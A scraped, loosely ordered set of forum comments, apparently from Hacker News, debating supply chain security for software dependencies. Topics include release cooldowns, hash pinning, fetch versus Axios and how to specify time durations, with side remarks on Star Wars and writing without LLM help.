[9] https://en.wikipedia.org/wiki/Resource_Description_Framework
[10] https://schema.org/
(Please do correct me if this is wrong, again, I don't have the experience myself.)
[1] https://pkg.odin-lang.org/
[2] https://www.gingerbill.org/article/2025/09/08/package-manage...
but, please don't use LLM to help write it from sketches. Even show the sketch :)
Much of my writing is very sketch-y. Some people don't like it, but its mine and I am proud of it and I hope that even if you write sketches/refine them, you can be comfortable sharing your ideas in your words in the way you wish to write them carl!
My thinking is that, I improve my writing by well... practice itself. So I write publically and there are some thoughts which occur in my head during the writing process itself (PG has a good article about it recently)
In a world of AI, to me, Human writing is a breath of fresh air. Please don't fall into the rabbit-hole that you might need LLM to help write you.
These are just my 2 cents though, but I feel like I am definitely not alone in thinking so.
Have a nice day and I am looking forward for you to write the article yourself. Feel free to share me when you do with my mail as I would love to read it, as I am also passionate about the funding of open source :)
MFA is typically enforced by organizations, forcing discipline. Individual usage of MFA is dramatically lower
Nor is fetch a good client-side API either; you want progress indicators, on both upload and download. Fetch is a poor API all-round.
For Star Wars, they retconned it to mean he found the shortest possible route through dangerous space, so even for Han Solo's quote, it's still distance.
Do you run automatic dependency updates over the weekend? Wouldn't you rather do that during fully-staffed hours?
As long as you don't update your pins during an active supply chain attack, the risk surface is rather low.
True. But seconds are not the base unit for package compromises coming to light. The appropriate unit for that is almost certainly days.
Initially I assumed this is sarcastic, but apparently not. UX and performance is what programmers are paid to do! Making sure UX is good is one of the most important things in programmer job.
While security is a moving target, a goal, something that can never be perfect, just "good enough" (if NSA wants to hack you, they will). You make it sound like installing third party packages is basically equivalent to a security hole, while in practice the risk is low, especially if you don't overdo it.
Wild to read extreme security views like that, while at the same time there are people here that run unconstrained AI agents with --dangerous-skip-confirm flags and see nothing wrong with it.
So Python's clearly not "batteries included" enough to avoid this kind of risk.
Scaling security with the popularity of a repo does seem like a good idea.
This is javascript, not Java.
In JavaScript something entirely new would be invented, to solve a problem that has long been solved and is documented in 20+ year old books on common design patterns. So we can all copy-paste `{ or: [{ days: 42, months: 2, hours: "DEFAULT", minutes: "IGNORE", seconds: null, timezone: "defer-by-ip" }, { timestamp: 17749453211*1000, unit: "ms"}]` without any clue as to what we are defining.
In Java, a 6000LoC+ ecosystem of classes, abstractions, dependency-injectables and probably a new DSL would be invented so we can all say "over 4 Malaysian workdays"
They explained it in the Solo movie.
https://www.reddit.com/r/MovieDetails/comments/ah3ptm/solo_a...
It's just library for handling time that 98% of the time your app will be using for something else.
I doubt anyone cares about an hour more or less in this context. But if you want multiple implementations to agree talking about seconds on a monotonic timer is a lot simpler
At work, we're happy with Python's included batteries when we need to make scripts instead of large programs.
Yeah, pretty bad idea.
Like congratulations, your dev was compromised whole 10 minutes later after he ran code.
In my experience, this works great for libraries internal to an organization (UI components, custom file formats, API type definitions, etc.). I don't see why it wouldn't also work for managing public dependencies.
Plus it's ecosystem-agnostic. Git submodules work just as well for JS as they do for Go, sample data/binary assets, or whatever other dependencies you need to manage.
The irony is that this is actually the current best practice to defend against supply chain attacks in the github actions layer. Pin all actions versions to a hash. There's an entire secondary set of dev tools for converting GHA version numbers to hashes
And for good reason. There are enough platform differences that you have to write your own code on top anyway.
Really? I thought 'asking you every time they want to do something' was called 'security fatigue' and generally considered to be a bad thing. Yes you can concatenate files in the current project, Claude.
And yes, we agree that running unconstrained AI agents with --dangerous-skip-confirm flags and seeing nothing wrong with it is insane. Kind of like just advertising for burglars to come open your doors for you before you get home - yeah, it's lots faster to get in (and to move about the house with all your stuff gone).
Depends. If you had to write add to a Makefile for your dependencies, you sure as hell aren't going to add 5k dependencies manually just to get a function that does $FOO; you'd write it yourself.
Now, with AI in the mix, there's fewer and fewer reasons to use so many dependencies.
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Refe...
> It's a very simple ship, very economical ship, although the modifications he made to it are rather extensive – mostly to the navigation system to get through hyperspace in the shortest possible distance (parsecs).
No. Axios is still maintained. They have not deprecated the project in favor of fetch.
new_date = add_workdays(
workdays=1.5,
start=datetime.now(),
regions=["es", "mx", "nl", "us"],
)If you're referring to my packages on npm, I joined way late to that game. This was also ~15 years ago.
Tell me about it. Using AI Chatbots (not even agents), I got a MVP of a packaging system[1] to my liking (to create packages for a proprietary ERP system) and an endpoint-API-testing tool, neither of which require a venv or similar to run.
------------------------------
[1] Okay, all it does now is create, sign, verify and unpack packages. There's a roadmap file for package distribution, which is a different problem.
I think you're incorrect to say that second are also ambiguous. Maybe what you mean is that days are more practical, but that seems very much a personal preference.
> Why do you believe that motivated threat hunters won’t continue to analyze and find threats in new versions of open source software in the first week after release?
I'm sure they will, but attackers will adapt. And I'm really unconvinced that these delays are really going to help in the real world. Imagine you rely on `popular-dependency` and it gets compromised. You have a cooldown, but I, the attacker, issue "CVE-1234" for `popular-dependency`. If you're at a company you now likely have a compliance obligation to patch that CVE within a strict timeline. I can very, very easily pressure you into this sort of thing.
I'm just unconvinced by the whole idea. It's fine, more time is nice, but it's not a good solution imo.
Because it is so few lines it is much more sensible to have everyone duplicate that little snippet manually than import a library and write interceptors for that...
(Not only because the integration with the library would likely be more lines of code, but also because a library is a significantly liability on several levels that must be justified by significant, not minor, recurring savings.)
Daylight savings time makes a day take 23 hours or 25 hours. That makes a week take 7254000 seconds or 7261200 seconds. Etc.
So it looks like even if no one actually updates, the vast majority of the cases will be caught by automated tools. You just need to give them a bit of time.
Mine's about 100 LOC. There's a lot you can get wrong. Having a way to use a known working version and update that rather than adding a hundred potentially unnecessary lines of code is a good thing. https://github.com/mikemaccana/fetch-unfucked/blob/master/sr...
> import a library and write interceptors for that...
What you suggesting people would have to intercept? Just import a library you trust and use it.
(This is all in the context of cooldowns, where I’m not convinced the there’s any real ambiguity risk by allowing the user to specify a duration in day or hour units rather than seconds. In that context a day is exactly 24 hours, regardless of what your local savings time rules are.)
You can find the patch files for your OSs by registering at Oracle with a J3EE8.4-PatchLibID (note, the older J3EE16-PatchLib-ids aren't compatible), attainable from your regional Oracle account-manager.
A joke should be funny though, not just a dry description of real life, so let's leave it at that. We've already taken it too far.
You could specify that for the purposes of cooldowns you want "hour" to mean an interval of 3600 seconds. But that you have to specify that should illustrate how ambiguous the concept of an hour is. It's not a useless concept by any means and I far prefer to specify duration in hours and days, but you have to spend a sentence or two on defining which definition of hours and days you are using. Or you don't and just hope nobody cares enough about the exact cooldown duration
- Don't waste time rewriting and maintaining code unecessarily. Install a package and use it.
- Have a minimum release age.
I do not know what the issue is.